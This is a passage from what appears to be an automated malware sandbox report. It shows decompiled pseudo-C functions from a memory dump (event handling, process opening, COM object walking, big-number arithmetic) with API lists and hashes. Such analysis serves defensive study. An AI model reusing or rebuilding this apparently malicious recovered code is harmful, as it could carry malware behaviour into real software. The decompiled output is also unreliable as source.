                                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t9 = __eax;
                                                                                                                                                                                                                        				_t22 = __eax;
                                                                                                                                                                                                                        				if(_a4 != 0 && E026F4F14(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                                        					return GetLastError();
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t10 = E026FA77A(_t9, _t18, _t22, _a8);
                                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                                        					ResetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                        					ResetEvent( *(_t22 + 0x20));
                                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                                        					_push(0xffffffff);
                                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                                        					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                                                                                                                                                                                        					if( *0x26fd12c() != 0) {
                                                                                                                                                                                                                        						SetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t10 = GetLastError();
                                                                                                                                                                                                                        						if(_t10 == 0x3e5) {
                                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                                        							_t10 = 0;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(_t10 == 0xffffffff) {
                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t10;
                                                                                                                                                                                                                        			}







                                                                                                                                                                                                                        0x026f3f5e
                                                                                                                                                                                                                        0x026f3f6b
                                                                                                                                                                                                                        0x026f3f6d
                                                                                                                                                                                                                        0x026f3fd0
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3fd0
                                                                                                                                                                                                                        0x026f3f85
                                                                                                                                                                                                                        0x026f3f8c
                                                                                                                                                                                                                        0x026f3f98
                                                                                                                                                                                                                        0x026f3f9d
                                                                                                                                                                                                                        0x026f3f9f
                                                                                                                                                                                                                        0x026f3fa1
                                                                                                                                                                                                                        0x026f3fa3
                                                                                                                                                                                                                        0x026f3fa5
                                                                                                                                                                                                                        0x026f3fa7
                                                                                                                                                                                                                        0x026f3fb3
                                                                                                                                                                                                                        0x026f3fc3
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3fb5
                                                                                                                                                                                                                        0x026f3fb5
                                                                                                                                                                                                                        0x026f3fbc
                                                                                                                                                                                                                        0x026f3fc9
                                                                                                                                                                                                                        0x026f3fc9
                                                                                                                                                                                                                        0x026f3fc9
                                                                                                                                                                                                                        0x026f3fbc
                                                                                                                                                                                                                        0x026f3fb3
                                                                                                                                                                                                                        0x026f3fce
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3fd4

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • ResetEvent.KERNEL32(?,00000008,?,?,00000102,026F519D,?,?,73BB81D0,00000000), ref: 026F3F98
                                                                                                                                                                                                                        • ResetEvent.KERNEL32(?), ref: 026F3F9D
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,026F896D,00000000,?,?), ref: 026F3FB5
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000102,026F519D,?,?,73BB81D0,00000000), ref: 026F3FD0
                                                                                                                                                                                                                          • Part of subcall function 026F4F14: lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,026F3F7D,?,?,?,?,00000102,026F519D,?,?,73BB81D0), ref: 026F4F20
                                                                                                                                                                                                                          • Part of subcall function 026F4F14: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,026F3F7D,?,?,?,?,00000102,026F519D,?), ref: 026F4F7E
                                                                                                                                                                                                                          • Part of subcall function 026F4F14: lstrcpy.KERNEL32(00000000,00000000), ref: 026F4F8E
                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,026F896D,00000000,?), ref: 026F3FC3
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1449191863-0
                                                                                                                                                                                                                        • Opcode ID: 7889dec478343a8745dcabbdd3e210838c6b300325206fed02db953155f865af
                                                                                                                                                                                                                        • Instruction ID: cd72f3ebca630e7fc23799bb49358d2b8fafc2c608478ee9c270e12069147c2a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7889dec478343a8745dcabbdd3e210838c6b300325206fed02db953155f865af
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9201D131545281ABDFB0AB31DC44F1BB6B9EF843A4F120A29F751D16E0C731E875DA60
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026F3B0B(intOrPtr _a4) {
                                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                                        				unsigned int _t4;
                                                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                                                        				long _t6;
                                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                        				 *0x26fd26c = _t2;
                                                                                                                                                                                                                        				if(_t2 == 0) {
                                                                                                                                                                                                                        					return GetLastError();
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                                        				if(_t4 != 5) {
                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                        					if(_t15 <= 0) {
                                                                                                                                                                                                                        						_t5 = 0x32;
                                                                                                                                                                                                                        						return _t5;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                        					 *0x26fd25c = _t4;
                                                                                                                                                                                                                        					_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                        					 *0x26fd258 = _t6;
                                                                                                                                                                                                                        					 *0x26fd264 = _a4;
                                                                                                                                                                                                                        					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                        					 *0x26fd254 = _t7;
                                                                                                                                                                                                                        					if(_t7 == 0) {
                                                                                                                                                                                                                        						 *0x26fd254 =  *0x26fd254 | 0xffffffff;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(_t4 >> 8 > 0) {
                                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t15 = _t4 - _t4;
                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                        0x026f3b13
                                                                                                                                                                                                                        0x026f3b19
                                                                                                                                                                                                                        0x026f3b20
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3b7a
                                                                                                                                                                                                                        0x026f3b22
                                                                                                                                                                                                                        0x026f3b2a
                                                                                                                                                                                                                        0x026f3b37
                                                                                                                                                                                                                        0x026f3b37
                                                                                                                                                                                                                        0x026f3b77
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3b77
                                                                                                                                                                                                                        0x026f3b39
                                                                                                                                                                                                                        0x026f3b39
                                                                                                                                                                                                                        0x026f3b3e
                                                                                                                                                                                                                        0x026f3b50
                                                                                                                                                                                                                        0x026f3b55
                                                                                                                                                                                                                        0x026f3b5b
                                                                                                                                                                                                                        0x026f3b61
                                                                                                                                                                                                                        0x026f3b68
                                                                                                                                                                                                                        0x026f3b6a
                                                                                                                                                                                                                        0x026f3b6a
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3b71
                                                                                                                                                                                                                        0x026f3b33
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f3b35
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,026F56AC,?), ref: 026F3B13
                                                                                                                                                                                                                        • GetVersion.KERNEL32 ref: 026F3B22
                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 026F3B3E
                                                                                                                                                                                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 026F3B5B
                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 026F3B7A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2270775618-0
                                                                                                                                                                                                                        • Opcode ID: b743b21ba5b6f020b6704e5e7b3a4d8f11fffc63faad016ec62aa8ebf4af5bb2
                                                                                                                                                                                                                        • Instruction ID: 2ac33ce12d53bb2ef41aa7583ffc8ac2c896d54f83340a8783b8ce1eb5a23cba
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b743b21ba5b6f020b6704e5e7b3a4d8f11fffc63faad016ec62aa8ebf4af5bb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FF08C70AC43C2ABDFE0AB28A86AB1C3B60A750751F00195AE742C63C0D771E0B2CB24
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 46%
                                                                                                                                                                                                                        			E026F4B71(intOrPtr* __eax) {
                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                        				short _v48;
                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                        				short _v64;
                                                                                                                                                                                                                        				intOrPtr* _t54;
                                                                                                                                                                                                                        				intOrPtr* _t56;
                                                                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                                                                        				intOrPtr* _t58;
                                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                                                        				intOrPtr* _t63;
                                                                                                                                                                                                                        				intOrPtr* _t65;
                                                                                                                                                                                                                        				short _t67;
                                                                                                                                                                                                                        				intOrPtr* _t68;
                                                                                                                                                                                                                        				intOrPtr* _t70;
                                                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                                                        				intOrPtr* _t75;
                                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                                                                                                        				intOrPtr* _t87;
                                                                                                                                                                                                                        				intOrPtr _t103;
                                                                                                                                                                                                                        				intOrPtr _t109;
                                                                                                                                                                                                                        				void* _t118;
                                                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                                                        				intOrPtr _t130;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t123 = _t122 - 0x3c;
                                                                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                                                                        				_push(__eax);
                                                                                                                                                                                                                        				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                                                                                                        				if(_t118 >= 0) {
                                                                                                                                                                                                                        					_t54 = _v8;
                                                                                                                                                                                                                        					_t103 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        					_t5 = _t103 + 0x26fe038; // 0x3050f485
                                                                                                                                                                                                                        					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                                                        					_t56 = _v8;
                                                                                                                                                                                                                        					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                                                        					if(_t118 >= 0) {
                                                                                                                                                                                                                        						__imp__#2(0x26fc298);
                                                                                                                                                                                                                        						_v28 = _t57;
                                                                                                                                                                                                                        						if(_t57 == 0) {
                                                                                                                                                                                                                        							_t118 = 0x8007000e;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t60 = _v32;
                                                                                                                                                                                                                        							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                                                        							_t87 = __imp__#6;
                                                                                                                                                                                                                        							_t118 = _t61;
                                                                                                                                                                                                                        							if(_t118 >= 0) {
                                                                                                                                                                                                                        								_t63 = _v24;
                                                                                                                                                                                                                        								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                                                        								if(_t118 >= 0) {
                                                                                                                                                                                                                        									_t130 = _v20;
                                                                                                                                                                                                                        									if(_t130 != 0) {
                                                                                                                                                                                                                        										_t67 = 3;
                                                                                                                                                                                                                        										_v64 = _t67;
                                                                                                                                                                                                                        										_v48 = _t67;
                                                                                                                                                                                                                        										_v56 = 0;
                                                                                                                                                                                                                        										_v40 = 0;
                                                                                                                                                                                                                        										if(_t130 > 0) {
                                                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                                                        												_t68 = _v24;
                                                                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                                                                        												_t123 = _t123;
                                                                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                                                                        												asm("movsd");
                                                                                                                                                                                                                        												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                                                                                                        												if(_t118 < 0) {
                                                                                                                                                                                                                        													goto L16;
                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                        												_t70 = _v8;
                                                                                                                                                                                                                        												_t109 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        												_t28 = _t109 + 0x26fe0bc; // 0x3050f1ff
                                                                                                                                                                                                                        												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                                                                                                        												if(_t118 >= 0) {
                                                                                                                                                                                                                        													_t75 = _v16;
                                                                                                                                                                                                                        													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                                                                                                        													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                        														_t79 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        														_t33 = _t79 + 0x26fe078; // 0x76006f
                                                                                                                                                                                                                        														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                                                        															_t83 = _v16;
                                                                                                                                                                                                                        															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                        														 *_t87(_v12);
                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                        													_t77 = _v16;
                                                                                                                                                                                                                        													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                        												_t72 = _v8;
                                                                                                                                                                                                                        												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                                                                        												_v40 = _v40 + 1;
                                                                                                                                                                                                                        												if(_v40 < _v20) {
                                                                                                                                                                                                                        													continue;
                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                        												goto L16;
                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                                        								_t65 = _v24;
                                                                                                                                                                                                                        								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							 *_t87(_v28);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t58 = _v32;
                                                                                                                                                                                                                        						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t118;
                                                                                                                                                                                                                        			}





































                                                                                                                                                                                                                        0x026f4b76
                                                                                                                                                                                                                        0x026f4b7f
                                                                                                                                                                                                                        0x026f4b80
                                                                                                                                                                                                                        0x026f4b84
                                                                                                                                                                                                                        0x026f4b8a
                                                                                                                                                                                                                        0x026f4b90
                                                                                                                                                                                                                        0x026f4b99
                                                                                                                                                                                                                        0x026f4b9f
                                                                                                                                                                                                                        0x026f4ba9
                                                                                                                                                                                                                        0x026f4bab
                                                                                                                                                                                                                        0x026f4bb1
                                                                                                                                                                                                                        0x026f4bb6
                                                                                                                                                                                                                        0x026f4bc1
                                                                                                                                                                                                                        0x026f4bc7
                                                                                                                                                                                                                        0x026f4bcc
                                                                                                                                                                                                                        0x026f4cee
                                                                                                                                                                                                                        0x026f4bd2
                                                                                                                                                                                                                        0x026f4bd2
                                                                                                                                                                                                                        0x026f4bdf
                                                                                                                                                                                                                        0x026f4be5
                                                                                                                                                                                                                        0x026f4beb
                                                                                                                                                                                                                        0x026f4bef
                                                                                                                                                                                                                        0x026f4bf5
                                                                                                                                                                                                                        0x026f4c02
                                                                                                                                                                                                                        0x026f4c06
                                                                                                                                                                                                                        0x026f4c0c
                                                                                                                                                                                                                        0x026f4c0f
                                                                                                                                                                                                                        0x026f4c17
                                                                                                                                                                                                                        0x026f4c18
                                                                                                                                                                                                                        0x026f4c1c
                                                                                                                                                                                                                        0x026f4c20
                                                                                                                                                                                                                        0x026f4c23
                                                                                                                                                                                                                        0x026f4c26
                                                                                                                                                                                                                        0x026f4c2c
                                                                                                                                                                                                                        0x026f4c35
                                                                                                                                                                                                                        0x026f4c3b
                                                                                                                                                                                                                        0x026f4c3c
                                                                                                                                                                                                                        0x026f4c3f
                                                                                                                                                                                                                        0x026f4c40
                                                                                                                                                                                                                        0x026f4c41
                                                                                                                                                                                                                        0x026f4c49
                                                                                                                                                                                                                        0x026f4c4a
                                                                                                                                                                                                                        0x026f4c4b
                                                                                                                                                                                                                        0x026f4c4d
                                                                                                                                                                                                                        0x026f4c51
                                                                                                                                                                                                                        0x026f4c55
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4c5b
                                                                                                                                                                                                                        0x026f4c64
                                                                                                                                                                                                                        0x026f4c6a
                                                                                                                                                                                                                        0x026f4c74
                                                                                                                                                                                                                        0x026f4c78
                                                                                                                                                                                                                        0x026f4c7a
                                                                                                                                                                                                                        0x026f4c87
                                                                                                                                                                                                                        0x026f4c8b
                                                                                                                                                                                                                        0x026f4c93
                                                                                                                                                                                                                        0x026f4c98
                                                                                                                                                                                                                        0x026f4caa
                                                                                                                                                                                                                        0x026f4cac
                                                                                                                                                                                                                        0x026f4cb2
                                                                                                                                                                                                                        0x026f4cb2
                                                                                                                                                                                                                        0x026f4cbb
                                                                                                                                                                                                                        0x026f4cbb
                                                                                                                                                                                                                        0x026f4cbd
                                                                                                                                                                                                                        0x026f4cc3
                                                                                                                                                                                                                        0x026f4cc3
                                                                                                                                                                                                                        0x026f4cc6
                                                                                                                                                                                                                        0x026f4ccc
                                                                                                                                                                                                                        0x026f4ccf
                                                                                                                                                                                                                        0x026f4cd8
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f4cd8
                                                                                                                                                                                                                        0x026f4c2c
                                                                                                                                                                                                                        0x026f4c26
                                                                                                                                                                                                                        0x026f4c0f
                                                                                                                                                                                                                        0x026f4cde
                                                                                                                                                                                                                        0x026f4cde
                                                                                                                                                                                                                        0x026f4ce4
                                                                                                                                                                                                                        0x026f4ce4
                                                                                                                                                                                                                        0x026f4cea
                                                                                                                                                                                                                        0x026f4cea
                                                                                                                                                                                                                        0x026f4cf3
                                                                                                                                                                                                                        0x026f4cf9
                                                                                                                                                                                                                        0x026f4cf9
                                                                                                                                                                                                                        0x026f4bb6
                                                                                                                                                                                                                        0x026f4d02

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(026FC298), ref: 026F4BC1
                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(00000000,0076006F), ref: 026F4CA2
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 026F4CBB
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 026F4CEA
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1885612795-0
                                                                                                                                                                                                                        • Opcode ID: 2030914c24edccafcec635d2ebda90e511ec25cc7fd080ee9cdcf9c851e1d788
                                                                                                                                                                                                                        • Instruction ID: f4908da2d46c60de40826c219104328ea20a648d7b6205c26e524e7804adca35
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2030914c24edccafcec635d2ebda90e511ec25cc7fd080ee9cdcf9c851e1d788
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B513F75D00519EFCF40DFA8C4889AEB7BAFF89704B144599EA15EB310DB329D41CBA0
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                                        			E026F4D8C(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                        				void _v92;
                                                                                                                                                                                                                        				void _v236;
                                                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                                                        				unsigned int _t56;
                                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                        				signed int* _t99;
                                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                                                                        				void* _t107;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t92 = _a12;
                                                                                                                                                                                                                        				_t101 = __eax;
                                                                                                                                                                                                                        				_t55 = E026F4481(_a16, _t92);
                                                                                                                                                                                                                        				_t79 = _t55;
                                                                                                                                                                                                                        				if(_t79 == 0) {
                                                                                                                                                                                                                        					L18:
                                                                                                                                                                                                                        					return _t55;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                                                        				_t81 = 0;
                                                                                                                                                                                                                        				_t96 = 0x20;
                                                                                                                                                                                                                        				if(_t56 == 0) {
                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                        					_t97 = _t96 - _t81;
                                                                                                                                                                                                                        					_v12 = _t96 - _t81;
                                                                                                                                                                                                                        					E026F65B9(_t79,  &_v236);
                                                                                                                                                                                                                        					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E026F8344(_t101,  &_v236, _a8, _t96 - _t81);
                                                                                                                                                                                                                        					E026F8344(_t79,  &_v92, _a12, _t97);
                                                                                                                                                                                                                        					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                                                                                                                                                                                        					_t66 = E026F65B9(_t101, 0x26fd1b0);
                                                                                                                                                                                                                        					_t103 = _t101 - _t79;
                                                                                                                                                                                                                        					_a8 = _t103;
                                                                                                                                                                                                                        					if(_t103 < 0) {
                                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                                        						E026F65B9(_a16, _a4);
                                                                                                                                                                                                                        						E026F4492(_t79,  &_v236, _a4, _t97);
                                                                                                                                                                                                                        						memset( &_v236, 0, 0x8c);
                                                                                                                                                                                                                        						_t55 = memset( &_v92, 0, 0x44);
                                                                                                                                                                                                                        						goto L18;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                                                                                                                                                                                        					do {
                                                                                                                                                                                                                        						if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                        							_push(1);
                                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                                        							_push( *_t99);
                                                                                                                                                                                                                        							L026FAE98();
                                                                                                                                                                                                                        							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                                                        							asm("adc edx, esi");
                                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                                        							_push(_v8 + 1);
                                                                                                                                                                                                                        							_push(_t92);
                                                                                                                                                                                                                        							_push(_t74);
                                                                                                                                                                                                                        							L026FAE92();
                                                                                                                                                                                                                        							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                        								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                        								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t74 =  *_t99;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                                                                                                                                                                                        						_a12 = _t74;
                                                                                                                                                                                                                        						_t76 = E026F8643(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                        							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                        							if( *_t99 != 0) {
                                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							L13:
                                                                                                                                                                                                                        							_t92 =  &_v92;
                                                                                                                                                                                                                        							if(E026F805E(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                                        							_a12 = _a12 + 1;
                                                                                                                                                                                                                        							_t76 = E026F3A3C(_t79,  &_v92, _t106, _t106);
                                                                                                                                                                                                                        							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                        							if( *_t99 != 0) {
                                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_a8 = _a8 - 1;
                                                                                                                                                                                                                        						_t66 = _a12;
                                                                                                                                                                                                                        						_t99 = _t99 - 4;
                                                                                                                                                                                                                        						 *(0x26fd1b0 + _a8 * 4) = _t66;
                                                                                                                                                                                                                        					} while (_a8 >= 0);
                                                                                                                                                                                                                        					_t97 = _v12;
                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				while(_t81 < _t96) {
                                                                                                                                                                                                                        					_t81 = _t81 + 1;
                                                                                                                                                                                                                        					_t56 = _t56 >> 1;
                                                                                                                                                                                                                        					if(_t56 != 0) {
